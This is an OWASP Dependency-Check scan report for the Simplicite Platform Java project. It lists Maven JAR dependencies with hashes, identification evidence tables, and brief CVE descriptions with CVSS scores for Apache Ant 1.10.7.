Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies;
false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and
the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties,
implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided
is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever
arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.
Scan Information:
dependency-check version: 7.4.3
Report Generated On: Mon, 15 Jan 2024 11:28:27 +0100
Dependencies Scanned: 357 (314 unique)
Vulnerable Dependencies: 70
Vulnerabilities Found: 247
Vulnerabilities Suppressed: 0
NVD CVE Checked: 2024-01-15T11:26:54
NVD CVE Modified: 2024-01-15T07:00:01
VersionCheckOn: 2024-01-09T17:35:29
kev.checked: 1705093300
Summary Display:
Showing Vulnerable Dependencies

Dependencies

FastInfoset-1.2.16.jar
Description: Open Source implementation of the Fast Infoset Standard for Binary XML (http://www.itu.int/ITU-T/asn1/).
License: http://www.opensource.org/licenses/apache2.0.php, http://www.eclipse.org/org/documents/edl-v10.php
File Path: /var/simplicite/.m2/repository/com/sun/xml/fastinfoset/FastInfoset/1.2.16/FastInfoset-1.2.16.jar
MD5: f7f4be4695e2501a6d585beca305c74c
SHA1: 4eb6a0adad553bf759ffe86927df6f3b848c8bea
SHA256: 056f3a1e144409f21ed16afc26805f58e9a21f3fce1543c42d400719d250c511
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | FastInfoset | High
Vendor | jar | package name | fastinfoset | Highest
Vendor | jar | package name | sun | Highest
Vendor | jar | package name | xml | Highest
Vendor | jar (hint) | package name | oracle | Highest
Vendor | Manifest | bundle-docurl | https://www.eclipse.org | Low
Vendor | Manifest | bundle-symbolicname | com.sun.xml.fastinfoset.FastInfoset | Medium
Vendor | Manifest | extension-name | com.sun.xml.fastinfoset | Medium
Vendor | Manifest | implementation-build-id | 1.2.16-df8b153, 2018-12-27T14:31:11+0000 | Low
Vendor | Manifest | Implementation-Vendor | Oracle Corporation | High
Vendor | Manifest | Implementation-Vendor-Id | com.sun.xml.fastinfoset | Medium
Vendor | pom | artifactid | FastInfoset | Highest
Vendor | pom | artifactid | FastInfoset | Low
Vendor | pom | groupid | com.sun.xml.fastinfoset | Highest
Vendor | pom | name | fastinfoset | High
Vendor | pom | parent-artifactid | fastinfoset-project | Low
Product | file | name | FastInfoset | High
Product | jar | package name | fastinfoset | Highest
Product | jar | package name | org | Highest
Product | jar | package name | sun | Highest
Product | jar | package name | xml | Highest
Product | Manifest | bundle-docurl | https://www.eclipse.org | Low
Product | Manifest | Bundle-Name | fastinfoset | Medium
Product | Manifest | bundle-symbolicname | com.sun.xml.fastinfoset.FastInfoset | Medium
Product | Manifest | extension-name | com.sun.xml.fastinfoset | Medium
Product | Manifest | implementation-build-id | 1.2.16-df8b153, 2018-12-27T14:31:11+0000 | Low
Product | Manifest | Implementation-Title | Fast Infoset Implementation | High
Product | Manifest | specification-title | ITU-T Rec. X.891 \| ISO/IEC 24824-1 (Fast Infoset) | Medium
Product | pom | artifactid | FastInfoset | Highest
Product | pom | groupid | com.sun.xml.fastinfoset | Highest
Product | pom | name | fastinfoset | High
Product | pom | parent-artifactid | fastinfoset-project | Medium
Version | file | version | 1.2.16 | High
Version | Manifest | Bundle-Version | 1.2.16 | High
Version | Manifest | Implementation-Version | 1.2.16 | High
Version | pom | version | 1.2.16 | Highest
HikariCP-3.4.0.jar
Description: Ultimate JDBC Connection Pool
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/zaxxer/HikariCP/3.4.0/HikariCP-3.4.0.jar
MD5: 60549ba87bf28ce69702302b62e527c5
SHA1: 6ce7ce51bd472b93a26bd26b41ad18e9b842ad41
SHA256: 0bd769d01a0e64b1a61053206343364ec6bde30b84d819c29de163bcfb485852
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | HikariCP | High
Vendor | jar | package name | hikari | Highest
Vendor | jar | package name | pool | Highest
Vendor | jar | package name | zaxxer | Highest
Vendor | Manifest | automatic-module-name | com.zaxxer.hikari | Medium
Vendor | Manifest | bundle-docurl | https://github.com/brettwooldridge | Low
Vendor | Manifest | bundle-symbolicname | com.zaxxer.HikariCP | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low
Vendor | pom | artifactid | HikariCP | Highest
Vendor | pom | artifactid | HikariCP | Low
Vendor | pom | developer email | brett.wooldridge@gmail.com | Low
Vendor | pom | developer name | Brett Wooldridge | Medium
Vendor | pom | groupid | com.zaxxer | Highest
Vendor | pom | name | HikariCP | High
Vendor | pom | organization name | Zaxxer.com | High
Vendor | pom | organization url | brettwooldridge | Medium
Vendor | pom | url | brettwooldridge/HikariCP | Highest
Product | file | name | HikariCP | High
Product | jar | package name | hikari | Highest
Product | jar | package name | pool | Highest
Product | jar | package name | zaxxer | Highest
Product | Manifest | automatic-module-name | com.zaxxer.hikari | Medium
Product | Manifest | bundle-docurl | https://github.com/brettwooldridge | Low
Product | Manifest | Bundle-Name | HikariCP | Medium
Product | Manifest | bundle-symbolicname | com.zaxxer.HikariCP | Medium
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low
Product | pom | artifactid | HikariCP | Highest
Product | pom | developer email | brett.wooldridge@gmail.com | Low
Product | pom | developer name | Brett Wooldridge | Low
Product | pom | groupid | com.zaxxer | Highest
Product | pom | name | HikariCP | High
Product | pom | organization name | Zaxxer.com | Low
Product | pom | url | brettwooldridge | High
Product | pom | url | brettwooldridge/HikariCP | High
Version | file | version | 3.4.0 | High
Version | Manifest | Bundle-Version | 3.4.0 | High
Version | pom | version | 3.4.0 | Highest
JavaEWAH-1.1.6.jar
Description:
The bit array data structure is implemented in Java as the BitSet class. Unfortunately, this fails to scale without compression.
JavaEWAH is a word-aligned compressed variant of the Java bitset class. It uses a 64-bit run-length encoding (RLE) compression scheme.
The goal of word-aligned compression is not to achieve the best compression, but rather to improve query processing time. Hence, we try to save CPU cycles, maybe at the expense of storage. However, the EWAH scheme we implemented is always more efficient storage-wise than an uncompressed bitmap (implemented in Java as the BitSet class). Unlike some alternatives, javaewah does not rely on a patented scheme.
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/googlecode/javaewah/JavaEWAH/1.1.6/JavaEWAH-1.1.6.jar
MD5: ad90237fa8e47defd9fdac73e68608fd
SHA1: 94ad16d728b374d65bd897625f3fbb3da223a2b6
SHA256: f78d44a1e3877f1ce748b4a85df5171e5e8e9a5c3c6f63bb9003db6f84cce952
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | JavaEWAH | High
Vendor | jar | package name | bitset | Highest
Vendor | jar | package name | googlecode | Highest
Vendor | jar | package name | javaewah | Highest
Vendor | Manifest | bundle-symbolicname | com.googlecode.javaewah.JavaEWAH | Medium
Vendor | pom | artifactid | JavaEWAH | Highest
Vendor | pom | artifactid | JavaEWAH | Low
Vendor | pom | developer email | lemire@gmail.com | Low
Vendor | pom | developer id | lemire | Medium
Vendor | pom | developer name | Daniel Lemire | Medium
Vendor | pom | developer org | LICEF Research Center | Medium
Vendor | pom | developer org URL | http://licef.ca | Medium
Vendor | pom | groupid | com.googlecode.javaewah | Highest
Vendor | pom | name | JavaEWAH | High
Vendor | pom | url | lemire/javaewah | Highest
Product | file | name | JavaEWAH | High
Product | jar | package name | bitset | Highest
Product | jar | package name | googlecode | Highest
Product | jar | package name | javaewah | Highest
Product | Manifest | Bundle-Name | JavaEWAH | Medium
Product | Manifest | bundle-symbolicname | com.googlecode.javaewah.JavaEWAH | Medium
Product | pom | artifactid | JavaEWAH | Highest
Product | pom | developer email | lemire@gmail.com | Low
Product | pom | developer id | lemire | Low
Product | pom | developer name | Daniel Lemire | Low
Product | pom | developer org | LICEF Research Center | Low
Product | pom | developer org URL | http://licef.ca | Low
Product | pom | groupid | com.googlecode.javaewah | Highest
Product | pom | name | JavaEWAH | High
Product | pom | url | lemire/javaewah | High
Version | file | version | 1.1.6 | High
Version | Manifest | Bundle-Version | 1.1.6 | High
Version | pom | version | 1.1.6 | Highest
activation-1.1.jar
Description: JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).
License: Common Development and Distribution License (CDDL) v1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /var/simplicite/.m2/repository/javax/activation/activation/1.1/activation-1.1.jar
MD5: 8ae38e87cd4f86059c0294a8fe3e0b18
SHA1: e6cb541461c2834bdea3eb920f1884d1eb508b50
SHA256: 2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | activation | High
Vendor | jar | package name | activation | Highest
Vendor | jar | package name | javax | Highest
Vendor | jar | package name | sun | Highest
Vendor | jar (hint) | package name | oracle | Highest
Vendor | Manifest | extension-name | javax.activation | Medium
Vendor | Manifest | Implementation-Vendor | Sun Microsystems, Inc. | High
Vendor | Manifest | Implementation-Vendor-Id | com.sun | Medium
Vendor | Manifest | specification-vendor | Sun Microsystems, Inc. | Low
Vendor | pom | artifactid | activation | Highest
Vendor | pom | artifactid | activation | Low
Vendor | pom | groupid | javax.activation | Highest
Vendor | pom | name | JavaBeans Activation Framework (JAF) | High
Vendor | pom | url | http://java.sun.com/products/javabeans/jaf/index.jsp | Highest
Product | file | name | activation | High
Product | jar | package name | activation | Highest
Product | jar | package name | javax | Highest
Product | Manifest | extension-name | javax.activation | Medium
Product | Manifest | specification-title | JavaBeans(TM) Activation Framework Specification | Medium
Product | pom | artifactid | activation | Highest
Product | pom | groupid | javax.activation | Highest
Product | pom | name | JavaBeans Activation Framework (JAF) | High
Product | pom | url | http://java.sun.com/products/javabeans/jaf/index.jsp | Medium
Version | file | version | 1.1 | High
Version | Manifest | Implementation-Version | 1.1 | High
Version | pom | version | 1.1 | Highest
animal-sniffer-annotations-1.18.jar
File Path: /var/simplicite/.m2/repository/org/codehaus/mojo/animal-sniffer-annotations/1.18/animal-sniffer-annotations-1.18.jar
MD5: f0a84f9b30590b3aa76edc893d6fe4ff
SHA1: f7aa683ea79dc6681ee9fb95756c999acbb62f5d
SHA256: 47f05852b48ee9baefef80fa3d8cea60efa4753c0013121dd7fe5eef2e5c729d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | animal-sniffer-annotations | High
Vendor | jar | package name | animal_sniffer | Low
Vendor | jar | package name | codehaus | Highest
Vendor | jar | package name | codehaus | Low
Vendor | jar | package name | mojo | Highest
Vendor | jar | package name | mojo | Low
Vendor | pom | artifactid | animal-sniffer-annotations | Highest
Vendor | pom | artifactid | animal-sniffer-annotations | Low
Vendor | pom | groupid | org.codehaus.mojo | Highest
Vendor | pom | name | Animal Sniffer Annotations | High
Vendor | pom | parent-artifactid | animal-sniffer-parent | Low
Product | file | name | animal-sniffer-annotations | High
Product | jar | package name | animal_sniffer | Low
Product | jar | package name | codehaus | Highest
Product | jar | package name | ignorejrerequirement | Low
Product | jar | package name | mojo | Highest
Product | jar | package name | mojo | Low
Product | pom | artifactid | animal-sniffer-annotations | Highest
Product | pom | groupid | org.codehaus.mojo | Highest
Product | pom | name | Animal Sniffer Annotations | High
Product | pom | parent-artifactid | animal-sniffer-parent | Medium
Version | file | version | 1.18 | High
Version | pom | version | 1.18 | Highest
annotations-4.1.1.4.jar
Description: A library jar that provides annotations for the Google Android Platform.
License: Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/com/google/android/annotations/4.1.1.4/annotations-4.1.1.4.jar
MD5: c2cdd26a6ae577f24775e8ce75da1fdc
SHA1: a1678ba907bf92691d879fef34e1a187038f9259
SHA256: ba734e1e84c09d615af6a09d33034b4f0442f8772dec120efb376d86a565ae15
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | annotations | High
Vendor | jar | package name | android | Highest
Vendor | jar | package name | android | Low
Vendor | jar | package name | annotation | Low
Vendor | pom | artifactid | annotations | Highest
Vendor | pom | artifactid | annotations | Low
Vendor | pom | developer name | The Android Open Source Projects | Medium
Vendor | pom | groupid | com.google.android | Highest
Vendor | pom | name | Google Android Annotations Library | High
Vendor | pom | url | http://source.android.com/ | Highest
Product | file | name | annotations | High
Product | jar | package name | android | Highest
Product | jar | package name | annotation | Low
Product | pom | artifactid | annotations | Highest
Product | pom | developer name | The Android Open Source Projects | Low
Product | pom | groupid | com.google.android | Highest
Product | pom | name | Google Android Annotations Library | High
Product | pom | url | http://source.android.com/ | Medium
Version | file | version | 4.1.1.4 | High
Version | pom | version | 4.1.1.4 | Highest
ant-1.10.7.jar
File Path: /var/simplicite/.m2/repository/org/apache/ant/ant/1.10.7/ant-1.10.7.jar
MD5: 66386ce040556ca4836fe829d0f1b293
SHA1: ebd23eb1f451de96e9a616f239408db88eedc1c2
SHA256: dab4d3b2e45b73aec95cb25ce5050a651ad060f50f74662bbc3c1cb406ec1d19
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | ant | High
Vendor | jar | package name | ant | Highest
Vendor | jar | package name | apache | Highest
Vendor | manifest: org/apache/tools/ant/ | Implementation-Vendor | Apache Software Foundation | Medium
Vendor | pom | artifactid | ant | Highest
Vendor | pom | artifactid | ant | Low
Vendor | pom | groupid | org.apache.ant | Highest
Vendor | pom | name | Apache Ant Core | High
Vendor | pom | parent-artifactid | ant-parent | Low
Vendor | pom | url | https://ant.apache.org/ | Highest
Product | file | name | ant | High
Product | jar | package name | ant | Highest
Product | jar | package name | apache | Highest
Product | jar | package name | tools | Highest
Product | manifest: org/apache/tools/ant/ | Implementation-Title | org.apache.tools.ant | Medium
Product | manifest: org/apache/tools/ant/ | Specification-Title | Apache Ant | Medium
Product | pom | artifactid | ant | Highest
Product | pom | groupid | org.apache.ant | Highest
Product | pom | name | Apache Ant Core | High
Product | pom | parent-artifactid | ant-parent | Medium
Product | pom | url | https://ant.apache.org/ | Medium
Version | file | version | 1.10.7 | High
Version | manifest: org/apache/tools/ant/ | Implementation-Version | 1.10.7 | Medium
Version | pom | version | 1.10.7 | Highest
Related Dependencies:
ant-launcher-1.10.7.jar
File Path: /var/simplicite/.m2/repository/org/apache/ant/ant-launcher/1.10.7/ant-launcher-1.10.7.jar
MD5: 68e4ba132f8168520087c3d89ca87b2a
SHA1: 43118ac1a5c01a9aa53117743b3d10d254547661
SHA256: 749d131ab53fd292041245bf24e4b6a6241766f17a5b987a4e4d833cd4234ae6
pkg:maven/org.apache.ant/ant-launcher@1.10.7

CVE-2020-1945
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.
CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (3.3), Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.3), Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-36373
When reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.
NVD-CWE-Other
CVSSv2: Base Score: MEDIUM (4.3), Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5), Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-36374
When reading a specially crafted ZIP archive, or derived formats, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used derived formats from ZIP archives are for instance JAR files and many office files. Apache Ant prior to 1.9.16 and 1.10.11 were affected.
NVD-CWE-Other
CVSSv2: Base Score: MEDIUM (4.3), Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: MEDIUM (5.5), Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
antlr-2.7.7.jar
Description: A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.
License: BSD License: http://www.antlr.org/license.html
File Path: /var/simplicite/.m2/repository/antlr/antlr/2.7.7/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256: 88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | antlr | High
Vendor | jar | package name | actions | Highest
Vendor | jar | package name | antlr | Highest
Vendor | jar | package name | antlr | Low
Vendor | jar | package name | java | Highest
Vendor | jar | package name | parser | Highest
Vendor | jar | package name | python | Highest
Vendor | pom | artifactid | antlr | Highest
Vendor | pom | artifactid | antlr | Low
Vendor | pom | groupid | antlr | Highest
Vendor | pom | name | AntLR Parser Generator | High
Vendor | pom | url | http://www.antlr.org/ | Highest
Product | file | name | antlr | High
Product | jar | package name | actions | Highest
Product | jar | package name | antlr | Highest
Product | jar | package name | java | Highest
Product | jar | package name | parser | Highest
Product | jar | package name | python | Highest
Product | pom | artifactid | antlr | Highest
Product | pom | groupid | antlr | Highest
Product | pom | name | AntLR Parser Generator | High
Product | pom | url | http://www.antlr.org/ | Medium
Version | file | version | 2.7.7 | High
Version | pom | version | 2.7.7 | Highest
antlr-runtime-3.5.2.jar
Description: A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.
File Path: /var/simplicite/.m2/repository/org/antlr/antlr-runtime/3.5.2/antlr-runtime-3.5.2.jar
MD5: 1fbbae2cb72530207c20b797bdabd029
SHA1: cd9cd41361c155f3af0f653009dcecb08d8b4afd
SHA256: ce3fc8ecb10f39e9a3cddcbb2ce350d272d9cd3d0b1e18e6fe73c3b9389c8734
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | antlr-runtime | High
Vendor | jar | package name | antlr | Highest
Vendor | jar | package name | runtime | Highest
Vendor | Manifest | Implementation-Vendor | ANTLR | High
Vendor | Manifest | Implementation-Vendor-Id | org.antlr | Medium
Vendor | pom | artifactid | antlr-runtime | Highest
Vendor | pom | artifactid | antlr-runtime | Low
Vendor | pom | developer email | jimi@temporal-wave.com | Low
Vendor | pom | developer email | parrt@antlr.org | Low
Vendor | pom | developer name | Jim Idle | Medium
Vendor | pom | developer name | Terence Parr | Medium
Vendor | pom | developer org | Temporal Wave LLC | Medium
Vendor | pom | developer org | USFCA | Medium
Vendor | pom | developer org URL | http://www.cs.usfca.edu | Medium
Vendor | pom | developer org URL | http://www.temporal-wave.com | Medium
Vendor | pom | groupid | org.antlr | Highest
Vendor | pom | name | ANTLR 3 Runtime | High
Vendor | pom | parent-artifactid | antlr-master | Low
Vendor | pom | url | http://www.antlr.org | Highest
Product | file | name | antlr-runtime | High
Product | jar | package name | antlr | Highest
Product | jar | package name | runtime | Highest
Product | Manifest | Implementation-Title | ANTLR 3 Runtime | High
Product | pom | artifactid | antlr-runtime | Highest
Product | pom | developer email | jimi@temporal-wave.com | Low
Product | pom | developer email | parrt@antlr.org | Low
Product | pom | developer name | Jim Idle | Low
Product | pom | developer name | Terence Parr | Low
Product | pom | developer org | Temporal Wave LLC | Low
Product | pom | developer org | USFCA | Low
Product | pom | developer org URL | http://www.cs.usfca.edu | Low
Product | pom | developer org URL | http://www.temporal-wave.com | Low
Product | pom | groupid | org.antlr | Highest
Product | pom | name | ANTLR 3 Runtime | High
Product | pom | parent-artifactid | antlr-master | Medium
Product | pom | url | http://www.antlr.org | Medium
Version | file | version | 3.5.2 | High
Version | Manifest | Implementation-Version | 3.5.2 | High
Version | pom | version | 3.5.2 | Highest
aopalliance-1.0.jar
Description: AOP Alliance
License: Public Domain
File Path: /var/simplicite/.m2/repository/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
SHA256: 0addec670fedcd3f113c5c8091d783280d23f75e3acb841b61a9cdb079376a08
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | aopalliance | High
Vendor | jar | package name | aop | Highest
Vendor | jar | package name | aopalliance | Highest
Vendor | jar | package name | aopalliance | Low
Vendor | jar | package name | intercept | Low
Vendor | pom | artifactid | aopalliance | Highest
Vendor | pom | artifactid | aopalliance | Low
Vendor | pom | groupid | aopalliance | Highest
Vendor | pom | name | AOP alliance | High
Vendor | pom | url | http://aopalliance.sourceforge.net | Highest
Product | file | name | aopalliance | High
Product | jar | package name | aop | Highest
Product | jar | package name | aopalliance | Highest
Product | jar | package name | intercept | Low
Product | pom | artifactid | aopalliance | Highest
Product | pom | groupid | aopalliance | Highest
Product | pom | name | AOP alliance | High
Product | pom | url | http://aopalliance.sourceforge.net | Medium
Version | file | version | 1.0 | High
Version | pom | version | 1.0 | Highest
apache-mime4j-core-0.8.3.jar
Description: Java stream based MIME message parser
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/james/apache-mime4j-core/0.8.3/apache-mime4j-core-0.8.3.jar
MD5: dc03793d8d9e208f4a21a36b78f922f0
SHA1: 1179b56c9919c1a8e20d3a528ee4c6cee19bcbe0
SHA256: 910002bd8d2fc413220386cd656a33b32f0007850dd53c2c0f30f90801eba6c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | apache-mime4j-core | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | james | Highest
Vendor | jar | package name | mime4j | Highest
Vendor | Manifest | bundle-docurl | https://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.james.apache-mime4j-core | Medium
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.james | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | apache-mime4j-core | Highest
Vendor | pom | artifactid | apache-mime4j-core | Low
Vendor | pom | groupid | org.apache.james | Highest
Vendor | pom | name | Apache James :: Mime4j :: Core | High
Vendor | pom | parent-artifactid | apache-mime4j-project | Low
Product | file | name | apache-mime4j-core | High
Product | jar | package name | apache | Highest
Product | jar | package name | james | Highest
Product | jar | package name | mime4j | Highest
Product | jar | package name | parser | Highest
Product | jar | package name | stream | Highest
Product | Manifest | bundle-docurl | https://www.apache.org/ | Low
Product | Manifest | Bundle-Name | Apache James :: Mime4j :: Core | Medium
Product | Manifest | bundle-symbolicname | org.apache.james.apache-mime4j-core | Medium
Product | Manifest | Implementation-Title | Apache James :: Mime4j :: Core | High
Product | Manifest | specification-title | Apache James :: Mime4j :: Core | Medium
Product | pom | artifactid | apache-mime4j-core | Highest
Product | pom | groupid | org.apache.james | Highest
Product | pom | name | Apache James :: Mime4j :: Core | High
Product | pom | parent-artifactid | apache-mime4j-project | Medium
Version | file | version | 0.8.3 | High
Version | Manifest | Bundle-Version | 0.8.3 | High
Version | Manifest | Implementation-Version | 0.8.3 | High
Version | pom | version | 0.8.3 | Highest
apache-mime4j-dom-0.8.3.jar
Description: Java MIME Document Object Model
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/james/apache-mime4j-dom/0.8.3/apache-mime4j-dom-0.8.3.jar
MD5: 13a1a7be7b85c9b03f6cba68e72d83c2
SHA1: e80733714eb6a70895bfc74a9528c658504c2c83
SHA256: b7f85517887b268d94fd16b13267d9e37a151440eff8acefab3a29ef30977435
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | apache-mime4j-dom | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | dom | Highest
Vendor | jar | package name | james | Highest
Vendor | jar | package name | mime4j | Highest
Vendor | Manifest | bundle-docurl | https://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.james.apache-mime4j-dom | Medium
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.james | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | apache-mime4j-dom | Highest
Vendor | pom | artifactid | apache-mime4j-dom | Low
Vendor | pom | groupid | org.apache.james | Highest
Vendor | pom | name | Apache James :: Mime4j :: DOM | High
Vendor | pom | parent-artifactid | apache-mime4j-project | Low
Product | file | name | apache-mime4j-dom | High
Product | jar | package name | apache | Highest
Product | jar | package name | dom | Highest
Product | jar | package name | james | Highest
Product | jar | package name | mime4j | Highest
Product | Manifest | bundle-docurl | https://www.apache.org/ | Low
Product | Manifest | Bundle-Name | Apache James :: Mime4j :: DOM | Medium
Product | Manifest | bundle-symbolicname | org.apache.james.apache-mime4j-dom | Medium
Product | Manifest | Implementation-Title | Apache James :: Mime4j :: DOM | High
Product | Manifest | specification-title | Apache James :: Mime4j :: DOM | Medium
Product | pom | artifactid | apache-mime4j-dom | Highest
Product | pom | groupid | org.apache.james | Highest
Product | pom | name | Apache James :: Mime4j :: DOM | High
Product | pom | parent-artifactid | apache-mime4j-project | Medium
Version | file | version | 0.8.3 | High
Version | Manifest | Bundle-Version | 0.8.3 | High
Version | Manifest | Implementation-Version | 0.8.3 | High
Version | pom | version | 0.8.3 | Highest
api-common-1.8.1.jar
Description: Common utilities for Google APIs in Java
License: BSD: https://github.com/googleapis/api-common-java/blob/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/google/api/api-common/1.8.1/api-common-1.8.1.jar
MD5: 839b9b829ff6a7172d640b33fbc2e1b3
SHA1: e89befb19b08ad84b262b2f226ab79aefcaa9d7f
SHA256: 9840ed24fce0a96492e671853077be62edab802b6760e3b327362d6949943674
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | api-common | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | automatic-module-name | com.google.api.apicommon | Medium
Vendor | pom | artifactid | api-common | Highest
Vendor | pom | artifactid | api-common | Low
Vendor | pom | developer email | googleapis@googlegroups.com | Low
Vendor | pom | developer id | GoogleAPIs | Medium
Vendor | pom | developer name | GoogleAPIs | Medium
Vendor | pom | developer org | org.apache.maven.model.Organization@41a186d9 | Medium
Vendor | pom | developer org URL | https://www.google.com | Medium
Vendor | pom | groupid | com.google.api | Highest
Vendor | pom | name | API Common | High
Vendor | pom | url | googleapis/api-common-java | Highest
Product | file | name | api-common | High
Product | jar | package name | api | Highest
Product | jar | package name | google | Highest
Product | Manifest | automatic-module-name | com.google.api.apicommon | Medium
Product | pom | artifactid | api-common | Highest
Product | pom | developer email | googleapis@googlegroups.com | Low
Product | pom | developer id | GoogleAPIs | Low
Product | pom | developer name | GoogleAPIs | Low
Product | pom | developer org | org.apache.maven.model.Organization@41a186d9 | Low
Product | pom | developer org URL | https://www.google.com | Low
Product | pom | groupid | com.google.api | Highest
Product | pom | name | API Common | High
Product | pom | url | googleapis/api-common-java | High
Version | file | version | 1.8.1 | High
Version | pom | version | 1.8.1 | Highest
asm-7.2-beta.jar
Description: ASM, a very small and fast Java bytecode manipulation framework
License: BSD: http://asm.ow2.org/license.html
File Path: /var/simplicite/.m2/repository/org/ow2/asm/asm/7.2-beta/asm-7.2-beta.jar
MD5: 11be68755323a89d5d9cf33ee306416a
SHA1: 42e26c6613fc9cb3002b55897802ab605c92dc44
SHA256: 00acf26a20b0c032b3d19ea0fbc079d6694b56de46e018ecf90e68cb7dd5caa2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | asm | High
Vendor | jar | package name | asm | Highest
Vendor | jar | package name | objectweb | Highest
Vendor | Manifest | bundle-docurl | http://asm.ow2.org | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5 | Low
Vendor | Manifest | bundle-symbolicname | org.objectweb.asm | Medium
Vendor | pom | artifactid | asm | Highest
Vendor | pom | artifactid | asm | Low
Vendor | pom | developer email | ebruneton@free.fr | Low
Vendor | pom | developer email | eu@javatx.org | Low
Vendor | pom | developer email | forax@univ-mlv.fr | Low
Vendor | pom | developer id | ebruneton | Medium
Vendor | pom | developer id | eu | Medium
Vendor | pom | developer id | forax | Medium
Vendor | pom | developer name | Eric Bruneton | Medium
Vendor | pom | developer name | Eugene Kuleshov | Medium
Vendor | pom | developer name | Remi Forax | Medium
Vendor | pom | groupid | org.ow2.asm | Highest
Vendor | pom | name | asm | High
Vendor | pom | organization name | OW2 | High
Vendor | pom | organization url | http://www.ow2.org/ | Medium
